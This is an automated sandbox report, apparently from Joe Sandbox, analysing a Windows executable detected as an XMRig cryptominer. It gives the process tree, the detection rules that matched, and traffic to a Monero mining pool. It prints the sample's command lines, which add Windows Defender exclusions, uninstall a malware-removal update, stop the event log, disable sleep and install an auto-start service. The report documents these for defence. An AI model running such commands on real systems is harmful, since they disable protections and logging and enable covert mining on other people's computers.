Windows Analysis Report
4o8Tgrb384.exe

Overview

General Information

Sample name: 4o8Tgrb384.exe (renamed because the original name is a hash value)
Original sample name: 414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b.exe
Analysis ID: 1557203
MD5: ee26108b32d7b5e5c1f47e51fd11dba2
SHA1: 0744a751814fe469254d4d8336f32243f8e1b395
SHA256: 414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b
Tags: exe, user-Chainskilabs

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 4o8Tgrb384.exe (PID: 6796 cmdline: "C:\Users\user\Desktop\4o8Tgrb384.exe" MD5: EE26108B32D7B5E5C1F47E51FD11DBA2)
    • powershell.exe (PID: 1148 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6348 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2772 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3984 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3020 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7032 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3572 cmdline: C:\Windows\system32\sc.exe delete "QVYJPHJR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3428 cmdline: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6748 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6780 cmdline: C:\Windows\system32\sc.exe start "QVYJPHJR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • atpljrtdlbzl.exe (PID: 4300 cmdline: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe MD5: EE26108B32D7B5E5C1F47E51FD11DBA2)
    • powershell.exe (PID: 4080 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4508 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3344 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2060 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2944 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3636 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2352 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 5184 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 39.2.svchost.exe.140000000.0.unpack, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 39.2.svchost.exe.140000000.0.unpack, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x370008:$a1: mining.set_target
  • 0x362230:$a2: XMRIG_HOSTNAME
  • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
  • 0x362208:$a4: XMRIG_VERSION
Source: 39.2.svchost.exe.140000000.0.unpack, Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Author: Florian Roth
  • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 39.2.svchost.exe.140000000.0.unpack, Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Author: ditekSHen
  • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3b9600:$s3: \\.\WinRing0_
  • 0x3671a8:$s4: pool_wallet
  • 0x3615d8:$s5: cryptonight
  • 0x3615e8:$s5: cryptonight
  • 0x3615f8:$s5: cryptonight
  • 0x361608:$s5: cryptonight
  • 0x361620:$s5: cryptonight
  • 0x361630:$s5: cryptonight
  • 0x361640:$s5: cryptonight
  • 0x361658:$s5: cryptonight
  • 0x361668:$s5: cryptonight
  • 0x361680:$s5: cryptonight
  • 0x361698:$s5: cryptonight
  • 0x3616a8:$s5: cryptonight
  • 0x3616b8:$s5: cryptonight
  • 0x3616c8:$s5: cryptonight
  • 0x3616e0:$s5: cryptonight
  • 0x3616f8:$s5: cryptonight
  • 0x361708:$s5: cryptonight
  • 0x361718:$s5: cryptonight

Change of critical system settings

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2772, ProcessName: powercfg.exe

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1148, ProcessName: powershell.exe
Source: Process started, Author: David Burkett, @signalblur, Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentImage: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentProcessId: 4300, ParentProcessName: atpljrtdlbzl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5184, ProcessName: svchost.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1148, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentImage: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentProcessId: 4300, ParentProcessName: atpljrtdlbzl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5184, ProcessName: svchost.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto", ProcessId: 3428, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1148, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentImage: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ParentProcessId: 4300, ParentProcessName: atpljrtdlbzl.exe, ProcessCommandLine: svchost.exe, ProcessId: 5184, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\4o8Tgrb384.exe", ParentImage: C:\Users\user\Desktop\4o8Tgrb384.exe, ParentProcessId: 6796, ParentProcessName: 4o8Tgrb384.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6748, ProcessName: sc.exe
No Suricata rule has matched

AV Detection

Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, ReversingLabs: Detection: 63%
Source: 4o8Tgrb384.exe, ReversingLabs: Detection: 63%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability

Bitcoin Miner

Source: Yara match, File source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000027.00000003.1491126958.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000003.1501182354.000001B0C3854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 5184, type: MEMORYSTR
Source: unknown, DNS query: name: xmr-eu1.nanopool.org
Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: svchost.exe, String found in binary or memory: cryptonight/0
Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: 4o8Tgrb384.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb, source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp
Source: global traffic, TCP traffic: 192.168.2.8:49705 -> 51.89.23.91:10343
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: svchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 00000027.00000003.2648761950.000001B0C38A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000003.2549406993.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670346828.000001B0C38A6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: svchost.exe, 00000027.00000002.2670244989.000001B0C386A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2670282093.000001B0C387F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: svchost.exe, 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: https://xmrig.com/docs/algorithms

System Summary

Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Monero Crypto Coin Miner, Author: Florian Roth
Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: Detects coinmining malware, Author: ditekSHen
Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
Source: Process Memory Space: svchost.exe PID: 5184, type: MEMORYSTR, Matched rule: MacOS_Cryptominer_Xmrig_241780a1, Author: unknown
Source: C:\Users\user\Desktop\4o8Tgrb384.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\4o8Tgrb384.exe, Code function: 0_2_00007FF67C751394 NtOpenThread, 0_2_00007FF67C751394
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, Code function: 24_2_00007FF62D5F1394 NtRollbackComplete, 24_2_00007FF62D5F1394
Source: C:\Windows\System32\conhost.exe, Code function: 37_2_0000000140001394 NtCreateEnlistment, 37_2_0000000140001394
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, File created: C:\Windows\TEMP\iwttnaazwiuc.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File deleted: C:\Windows\Temp\__PSScriptPolicyTest_bdfyvat2.j1j.ps1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe, Code function: 0_2_00007FF67C753B50, 0_2_00007FF67C753B50
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, Code function: 24_2_00007FF62D5F3B50, 24_2_00007FF62D5F3B50
Source: C:\Windows\System32\conhost.exe, Code function: 37_2_0000000140003150, 37_2_0000000140003150
Source: C:\Windows\System32\conhost.exe, Code function: 37_2_00000001400026E0, 37_2_00000001400026E0
Source: Joe Sandbox View, Dropped File: C:\Windows\Temp\iwttnaazwiuc.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Users\user\Desktop\4o8Tgrb384.exe, Code function: String function: 00007FF67C751394 appears 33 times
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe, Code function: String function: 00007FF62D5F1394 appears 33 times
Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000027.00000002.2668768314.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: svchost.exe PID: 5184, type: MEMORYSTR, Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine, Classification label: mal100.spyw.evad.mine.winEXE@58/12@1/1
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2512:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:1612:120:WilError_03
Source: C:\Windows\System32\svchost.exe, Mutant created: \BaseNamedObjects\Global\tdgcdawemmhktkyo
